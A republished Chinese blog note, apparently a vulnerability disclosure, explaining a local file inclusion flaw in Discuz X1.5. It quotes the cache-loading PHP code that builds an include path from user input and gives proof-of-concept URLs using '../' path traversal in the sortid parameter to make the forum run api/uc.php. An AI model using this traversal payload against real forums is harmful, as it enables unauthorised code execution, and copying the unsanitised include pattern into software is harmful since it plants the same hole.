1. 首页
  2. 文章中心
  3. 漏洞分析

DISCUZ X1.5 本地文件包含漏洞说明

310 阅读 0 评论
我是靠谱客的博主 炙热季节,这篇文章主要介绍DISCUZ X1.5 本地文件包含漏洞说明,现在分享给大家,希望可以做个参考。

config_global.php

复制代码
代码如下:

  $_config['cache']['type'] = ‘file’;
  function cachedata($cachenames) {
  ……
  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;
  ……
  if($isfilecache) {
  $lostcaches = array();
  foreach($cachenames as $cachename) {
  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
  $lostcaches[] = $cachename;
  }
  }
  ……
  }

  地址:
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
  执行了 api/uc.php 页面代码了。
  作者: Jannock

最后

以上就是炙热季节最近收集整理的关于DISCUZ X1.5 本地文件包含漏洞说明的全部内容,更多相关DISCUZ内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(205)

相关文章

网络机顶盒什么牌子好?四款最受欢迎直播神器
网络机顶盒什么牌子好?四款最受欢迎直播神器
Photoshop 人物照片个性冷色调
Photoshop 人物照片个性冷色调
photoshop 美女换头像
photoshop 美女换头像
win10系统怎么设置自动登录?Win10系统记住密码自动登录
win10系统怎么设置自动登录?Win10系统记住密码自动登录
DISCUZ X1.5 本地文件包含漏洞说明
DISCUZ X1.5 本地文件包含漏洞说明
用expect实现ssh自动登录服务器并进行批量管理的实现方法
用expect实现ssh自动登录服务器并进行批量管理的实现方法
photoshop显示器偏色怎么调? ps显示器偏黄的解决办法
photoshop显示器偏色怎么调? ps显示器偏黄的解决办法
SeaJS入门教程系列之使用SeaJS(二)
SeaJS入门教程系列之使用SeaJS(二)

评论列表共有 0 条评论

立即
投稿
返回
顶部